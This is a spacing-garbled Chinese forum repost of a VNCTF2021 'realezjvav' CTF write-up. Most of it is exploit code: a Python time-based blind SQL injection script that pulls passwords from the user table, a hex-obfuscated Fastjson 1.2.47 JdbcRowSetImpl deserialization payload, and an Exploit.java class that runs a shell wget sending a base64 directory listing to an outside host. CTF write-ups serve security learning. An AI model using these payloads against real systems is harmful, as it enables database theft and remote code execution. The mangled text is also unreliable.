搜索

[2260] 2021-03-15_[VNCTF2021]realezjvav

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-16
2021-03-15_[VNCTF2021]realezjvav [ V N C T F   2 0 2 1 ] r e a l e z j v a v   E D I   E D I   2 0 2 1 - 0 3 - 1 5   ·     j a v a     s q l p a s s w o r d   5 0 0 f u z z          
      穿     p o m . x m l   j s o n h t t p s : / / g i t h u b . c o m / C a i j i O r z / f a s t j s o n - 1 . 2 . 4 7 - R C E p a y l o a d   i m p o r t   r e q u e s t s u r l = " h t t p : / / c 5 6 0 8 3 a c - 9 d a 0 - 4 3 7 e - 9 b 5 1 - 5 d b 0 4 7 b 1 5 0 a a . j v a v . v n c t f 2 0 2 1 . n o d e 4 . b u u o j . c n : 8 2 / u s e r / l o g i n " f l a g = ' ' f o r   i   i n   r a n g e ( 1 , 5 0 ) :         f 1 = f l a g         t o p = 1 2 7         l o w = 3 3         w h i l e   l o w < = t o p :                 m i d = ( t o p + l o w ) / / 2                 #   p 1 = " a d m i n ' / * * / a n d / * * / i f ( a s c i i ( s u b s t r ( ( s e l e c t / * * / g r o u p _ c o n c a t ( c o l u m n _ n a m e ) / * * / f r o m / * * / i n f o r m a t i o n _ s c h e m a . c o l u m n s / * * / w h e r e / * * / t a b l e _ s c h e m a = d a t a b a s e ( ) / * * / a n d / * * / t a b l e _ n a m e = ' u s e r ' ) , { } , 1 ) ) = { } , 1 , 0 ) / * * / a n d / * * / ( S E L E C T / * * / c o u n t ( * ) / * * / F R O M / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / A , / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / B , i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / C ) # " . f o r m a t ( i , m i d )                 #   p 2 = " a d m i n ' / * * / a n d / * * / i f ( a s c i i ( s u b s t r ( ( s e l e c t / * * / g r o u p _ c o n c a t ( c o l u m n _ n a m e ) / * * / f r o m / * * / i n f o r m a t i o n _ s c h e m a . c o l u m n s / * * / w h e r e / * * / t a b l e _ s c h e m a = d a t a b a s e ( ) / * * / a n d / * * / t a b l e _ n a m e = ' u s e r ' ) , { } , 1 ) ) > { } , 1 , 0 ) / * * / a n d / * * / ( S E L E C T / * * / c o u n t ( * ) / * * / F R O M / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / A , / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / B , i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / C ) # " . f o r m a t ( i , m i d )                 p 1 = " a d m i n ' / * * / a n d / * * / i f ( a s c i i ( s u b s t r ( ( s e l e c t / * * / g r o u p _ c o n c a t ( p a s s w o r d ) / * * / f r o m / * * / u s e r ) , { } , 1 ) ) = { } , 1 , 0 ) / * * / a n d / * * / ( S E L E C T / * * / c o u n t ( * ) / * * / F R O M / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / A , / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / B , i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / C ) # "                 p 2 = " a d m i n ' / * * / a n d / * * / i f ( a s c i i ( s u b s t r ( ( s e l e c t / * * / g r o u p _ c o n c a t ( p a s s w o r d ) / * * / f r o m / * * / u s e r ) , { } , 1 ) ) > { } , 1 , 0 ) / * * / a n d / * * / ( S E L E C T / * * / c o u n t ( * ) / * * / F R O M / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / A , / * * / i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / B , i n f o r m a t i o n _ s c h e m a . t a b l e s / * * / C ) # "                 d a t a 1 = { ' u s e r n a m e ' : ' a d m i n ' , ' p a s s w o r d ' : p 1 }                 d a t a 2 = { ' u s e r n a m e ' : ' a d m i n ' , ' p a s s w o r d ' : p 2 }                 t r y :                         p r i n t ( i , m i d )                         r 1 = r e q u e s t s . p o s t ( u r l , d a t a = d a t a 1 , t i m e o u t = 1 )                 e x c e p t   r e q u e s t s . e x c e p t i o n s . R e a d T i m e o u t   a s   e :                         f l a g + = c h r ( m i d )                         p r i n t ( f l a g )                         b r e a k                 e x c e p t   E x c e p t i o n   a s   e :                         p a s s                 e l s e :                         t r y :                                 r 2 = r e q u e s t s . p o s t ( u r l , d a t a = d a t a 2 , t i m e o u t = 1 )                         e x c e p t   r e q u e s t s . e x c e p t i o n s . R e a d T i m e o u t   a s   e :                                 l o w = m i d + 1                         e x c e p t   E x c e p t i o n   a s   e :                                 p a s s                         e l s e :                                 t o p = m i d - 1         i f   f l a g = = f 1 :                 b r e a k #   u s e r #   i d , u s e r n a m e , p a s s w o r d #   n o _ 0 n e _ k n 0 w _ t h 1 s
p   p a y l o a d : b a s h   d n s l o g f l a g     E x p l o i t . j a v a r o l e J s o n = { " n a m e " : { " x 4 0 x 7 4 x 7 9 x 7 0 x 6 5 " : " j a v a . l a n g . C l a s s " , " v a l " : " x 6 3 x 6 f x 6 d x 2 e x 7 3 x 7 5 x 6 e x 2 e x 7 2 x 6 f x 7 7 x 7 3 x 6 5 x 7 4 x 2 e x 4 a x 6 4 x 6 2 x 6 3 x 5 2 x 6 f x 7 7 x 5 3 x 6 5 x 7 4 x 4 9 x 6 d x 7 0 x 6 c " p u b l i c   c l a s s   E x p l o i t {         p u b l i c   E x p l o i t ( ) {                 t r y {                         R u n t i m e . g e t R u n t i m e ( ) . e x e c ( n e w   S t r i n g [ ] { " / b i n / s h " , " - c " , " w g e t   h t t p : / / 1 . 1 . 1 . 1 : 9 0 0 / ? a = $ ( l s   / | b a s e 6 4   - w 0 " } ) ;                 } c a t c h ( E x c e p t i o n   e ) {                         e . p r i n t S t a c k T r a c e ( ) ;                 }         }         p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g v ) {                 E x p l o i t   e   =   n e w   E x p l o i t ( ) ;         } }
E D I
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理